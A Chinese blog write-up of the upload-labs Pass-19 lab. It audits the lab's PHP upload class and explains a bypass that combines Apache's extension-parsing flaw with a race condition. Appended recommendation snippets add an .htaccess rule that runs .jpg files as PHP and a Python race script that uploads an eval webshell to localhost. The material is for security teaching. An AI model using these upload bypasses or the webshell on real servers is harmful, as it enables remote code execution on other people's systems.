upload-labs pass-19

最新推荐文章于 2025-12-02 16:19:28 发布
原创 最新推荐文章于 2025-12-02 16:19:28 发布 · 787 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全

本关的代码看起来比较复杂,这里创建了一个My_upload类来对文件上传进行处理。

首先,需要注意,这里的上传路径出现了点问题,这里的上传到了upload同级目录里面,需要修改一下源码,使上传目录在upload里面,可以按照下图修改,两个位置选一个改就可以了,图1为myupload.php文件的第103行,或者修改index.php里的第13行内容,

接下来,来审计代码,index.php就是使用MyUpload类来处理上传文件,根据MyUpload类返回的值来打印对应上传状态信息。

接下来,重要的是myupload.php里的内容。

//myupload.php
class MyUpload{
......
......
...... 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );

......
......
......  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  
  }
......
......
...... 
};

        首先,定义后缀白名单,接着处理流程是:是否上传文件设置上传目录检查文件后缀检查文件大小移动到上传目录修改文件名。

        这里观察一下,可以发现,白名单里面的文件几乎都是“非执行文件”,大多是静态资源、文档或压缩包。这里“执行文件”可以指能被服务器(或系统)直接执行代码 / 逻辑的文件(比如 .php(PHP 脚本)、.asp(ASP 脚本)、.jspx(Java Web 脚本)、.exe(Windows 可执行程序)等)。

        而由于这里作者也没有给予一个文件包含漏洞窗口,即意味着作者设计这关的目的不是让我们上传图片马,这里是可以利用文件包含漏洞上传图片马利用的,因为图片回显在了主页,我们可以获取到文件名,所以这里想其他方法。这里我们的目的就是上传一个“非执行文件”,还要让它被当作“可执行文件”来处理。

        这里就需要用到Apache的解析漏洞了,在Apache 1.x-2.x版本,存在解析漏洞,也就是Apache在遇到不认识的后缀时,会依次从右向左解析,若都不认识则会暴露源码,也就是说如果这里有一个....\abc.php.abcd 文件,那么由于Apache不认识abcd这个后缀,则会向前解析,也就是解析为abc.php。

        httpd.cong这个文件指定了Apache可以执行的文件类型,如图中的".z"、",gz"、",tgz"、".php"等。这里再看一下上面的验证白名单,里面有很多Apache不认识的文件名,我们上传以Apache不认识的后缀进行绕过。

        由于这里做了重命名处理,我们尽管上传了如“abc.php.7z”这种文件,但是存在服务端就只剩下“随机数+.7z"的文件名了,不是可执行文件,不可以执行,所以我们需要在文件被重命名之前访问这个文件,利用file_put_contents留下一个php文件,达到稳定连接。这里就和上一关的条件竞争一样了,大量重放两个数据包。

可以看到,留下了我们想要的文件。我们直接访问即可。

解题点:Apache解析漏洞+条件竞争。

upload-labs Pass-08
wanggonghanfei的博客
10-21 482
利用这一点,我们可以上传我们的shell,然后抓包,在包中修改文件后缀添加一个点,来达到绕过。在windows环境下,假设我们新建一个1.php文件,然后在文件后缀加一个。windows会默认去掉那个点,变成1.php。file_name);//删除文件名末尾的点。发现相较于之前关卡,缺少了。
upload-labs Pass-15
wanggonghanfei的博客
10-23 336
根据源码分析,本关卡任然可以使用图片制作的webshell。利用文件包含漏洞直接访问,详细步骤可以查看我。制作图片木马,然后直接上传,准备文件info.php。
网络安全upload-labs Pass-19 解题详析
等风来
08-23 5909
本文介绍了如何通过修改myupload.php文件中的代码,利用图片码绕过文件上传限制,上传含有eval代码的GIF文件,并通过文件包含功能点实现命令执行。文章详细描述了上传过程、获取图片路径、利用文件包含功能点执行命令的步骤,并提供了POC示例。此外,文章还提到可以通过条件竞争的方式完成该任务,并提供了相关参考链接。读者可参考相关专栏和文章,进一步学习网络安全攻防实战技巧。
[网络安全]upload-labs Pass-19 解题详析_upload-labs19
2401_84972703的博客
05-13 634
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
upload-labs pass-13
记录自己学习安全知识的笔记, 沉淀ing
10-15 198
这里注意,直接提交是没有作用的,因为POST提交的数据不一致,它还会把我们提交的请求转为十六进制编码提交,我们还需要修改Hex里的内容。我们然后点进旁边的Hex,进行修改。这一关和上一个类似,不过这里是通过POST控制上传路径,我们还是上传一个文件,然后在burp里面改包。找到我们添加的后缀,31,然后在右边的面板中将Code值改为00,然后点击应用就可以了。我们将save_path路径修改一下,后面的1是为了方便定位文件结尾位置。post型00截断,需要再Hex中修改内容。
Upload-labs Pass-19 /.绕过
baynk的博客
11-05 1476
Pass-19 /.绕过 弄了一会,没思路,解析漏洞都给关了,黑名单似乎也没有什么好办法了,先看源码吧 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","p...
upload-labs pass-16
weixin_54347738的博客
09-05 316
建议将文件都写在D盘下,否则后面会因为权限问题无法再16进制编辑器中修改文件字段。
网络安全upload-labs Pass-15 解题详析
等风来
08-16 5669
使用getimagesize()函数获取图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度,并将其取出的文件类型信息$info[2]与文件后缀白名单进行对比,判断上传的文件是否合法,并将info[2]作为上传后的文件的后缀名。其它操作同Pass-14,本文不再赘述。于是我们仍可以使用图片码上传。
upload-labs19-20以及总结1
08-08
Pass19中,开发者试图通过限制上传文件的扩展名来防止这种攻击,但是他们只检查了保存文件名(`save_name`)是否包含黑名单中的扩展名,而未检查实际上传文件的类型。 以下是该关卡的主要知识点: 1. **文件名...
upload-labs通关指南
01-22
upload-labs通关指南》是一份针对upload_labs文件上传靶场的详细通关攻略文档。在网络安全领域,文件上传靶场是一个专门用于学习和研究文件上传漏洞攻防技术的平台。本指南不仅涵盖了客户端验证漏洞和多种服务端...
upload-labs Pass1-20 已完结
weixin_46099552的博客
08-14 489
upload-labs
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8832
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全(黑客技术)—2025自学手册
2401_84760527的博客
11-24 1536
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
人工智能时代,如何打造网络安全“新范式”
Fnetlink1的博客
12-02 256
在当今信息化迅速发展的时代,5G、大数据、云计算、深度学习等新兴技术的广泛应用,带来了前所未有的网络安全挑战。人工智能技术的崛起,为网络安全领域提供了新的解决方案,尤其在威胁识别、告警分析、态势感知、风险评估、恶意检测和安全运营等关键环节中展现出独特的优势。随着技术的不断进步,利用人工智能赋能网络安全已成为业内的一种趋势。
企业级Web安全加速方案:一体化防护DDoS/CC/爬虫攻击
2201_76066823的博客
12-02 255
针对DDoS、CC攻击及恶意爬虫的一体化防护方案需整合多层防御策略,结合流量清洗、行为分析、智能验证等技术,确保业务高可用性与数据安全
远程桌面提权漏洞复现:原理详解+环境搭建+渗透实战(CVE-2019-0708)
mooyuan的网络安全博客
11-25 1205
本文分析了CVE-2019-0708(BlueKeep)远程桌面提权漏洞,该漏洞影响Windows旧版本系统,攻击者可通过RDP协议远程执行任意代码。文章详细介绍了漏洞原理、影响范围及防范措施,重点演示了利用Metasploit框架进行渗透测试的全过程,包括环境搭建、漏洞探测、模块配置、攻击实施及后渗透操作(创建管理员账号、远程连接等)。通过实验验证了该漏洞的严重性,强调及时打补丁和采取防护措施的重要性。
网络安全系列:社会工程学攻防技术详解
PyHaVolask的博客
12-02 850
本文系统阐述社会工程学的攻防技术,涵盖网络钓鱼网站制作、电话欺诈(Vishing)、匿名通信工具使用及个人信息侦察(OSINT)等核心攻击手段,并提供个人与企业层面的具体防御策略,强调安全意识在防范人为漏洞中的决定性作用。
STM32+MAX7219数码管模块显示程序 SPI接口
最新发布
12-02
提供了基于STM32F4xx系列的MAX7219数码管模块显示程序,通过SPI串行总线进行通信,使用库函数进行编程。经过实际测试,该程序能够正常驱动数码管进行显示。 特点 基于STM32F4xx系列MCU 使用SPI串行总线通信 采用库函数编程 实测能正常驱动MAX7219数码管模块显示
upload-labs pass21
07-20
upload-labs 项目中,Pass-21 的解题思路主要围绕文件上传时的 **MIME 类型验证绕过** 和 **文件名解析漏洞利用**。虽然未在提供的引用中直接提及 Pass-21 的具体细节,但根据 upload-labs 系列的常见设计逻辑,Pass-21 很可能涉及以下攻击模式: ### 三级标题:MIME 类型验证绕过 在某些关卡中,服务器会通过检查上传文件的 MIME 类型来阻止非图片文件的上传。攻击者可以通过在上传请求中修改 `Content-Type` 字段来绕过该检查,例如将其设置为 `image/jpeg` 或 `image/png`,即使上传的是 `.php` 文件。这种方式常用于绕过前端或服务器端的简单 MIME 类型检测机制[^1]。 ### 三级标题:双重扩展名上传与解析漏洞 服务器端可能使用了不安全的文件名处理方式,例如仅过滤了 `.php` 扩展名,但未对多个扩展名进行处理。攻击者可以尝试上传类似 `shell.php.jpg` 的文件,随后通过某些方式(如 Apache 的解析特性)使服务器将 `.php.jpg` 文件当作 PHP 脚本执行。这种攻击方式依赖于服务器配置不当,例如 Apache 的 `mod_php` 模块会解析最后一个匹配 `.php` 的扩展名。 ### 三级标题:结合 .htaccess 文件实现解析绕过 如果服务器允许上传 `.htaccess` 文件,则攻击者可以上传一个自定义的 `.htaccess` 文件,配置其将特定扩展名(如 `.jpg`)解析为 PHP 脚本。例如,添加如下内容: ```apache AddType application/x-httpd-php .jpg ``` 上传后,再上传一个以 `.jpg` 结尾的 PHP 文件,服务器会将其当作 PHP 脚本执行。这种方式常见于 Linux 环境下的 upload-labs 关卡[^3]。 ### 三级标题:条件竞争与多线程上传 在某些情况下,服务器可能对上传后的文件进行异步检查或清理,攻击者可以利用时间差进行条件竞争攻击。通过并发脚本快速上传并访问恶意文件,从而在文件被删除前完成命令执行。例如使用 Python 脚本进行多线程上传和访问: ```python import threading import requests def upload_file(): url = "http://localhost/upload-labs-master/upload.php" files = {'file': ('shell.php', "<?php @eval($_POST['cmd']); ?>", 'image/jpeg')} data = {'submit': 'Upload'} while True: requests.post(url, files=files, data=data) def access_file(): while True: requests.get("http://localhost/upload-labs-master/uploads/shell.php") threads = [] for _ in range(10): t = threading.Thread(target=upload_file) t.start() threads.append(t) for _ in range(2): t = threading.Thread(target=access_file) t.start() threads.append(t) ``` 此脚本通过并发上传和访问,尝试在服务器清理文件前完成攻击过程。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forfun_tt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值